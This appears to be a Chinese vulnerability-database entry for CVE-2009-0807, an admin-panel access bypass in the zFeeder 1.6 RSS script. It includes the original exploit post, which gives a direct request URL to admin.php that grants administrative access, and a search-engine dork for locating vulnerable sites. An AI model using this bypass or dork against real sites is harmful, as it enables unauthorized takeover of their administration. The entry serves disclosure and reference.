zfeeder 'admin.php'权限许可和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117416 漏洞类型 权限许可和访问控制
发布时间 2009-02-23 更新时间 2009-03-04
CVE编号 CVE-2009-0807 CNNVD-ID CNNVD-200903-073
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/8092
https://www.securityfocus.com/bid/79557
https://cxsecurity.com/issue/WLB-2009030129
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-073
|漏洞详情
zFeeder是一个PHP脚本用于显示RSS内容。zFeeder1.6版本运行远程攻击者可以借助对admin.php提交一个直接的请求,获得管理访问权。
|漏洞EXP
-----------------:remote bypass admin panel:-----------------
-------------------------------------------------------
script:zfeeder 1.6
    
------------------------------------------------------------------
download from:http://www.mirrorservice.org/sites/download.sourceforge.net/pub/sourceforge/z/zv/zvonnews/zfeeder-1.6.zip
   
------------------------------------------------------------------
.......................................................
xpl:

http://127.0.0.1/path/admin.php?zfaction=config
------------------------------------------------------

dork: intitle:"zFeeder admin panel"
-----------------------------------------------------

***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady  [kivi_hacker666@yahoo.com]
---------------------------------------------------

# milw0rm.com [2009-02-23]
|受影响的产品
Zfeeder Zfeeder 1.6
|参考资料

来源:XF
名称:zfeeder-admin-security-bypass(48866)
链接:http://xforce.iss.net/xforce/xfdb/48866
来源:MILW0RM
名称:8092
链接:http://www.milw0rm.com/exploits/8092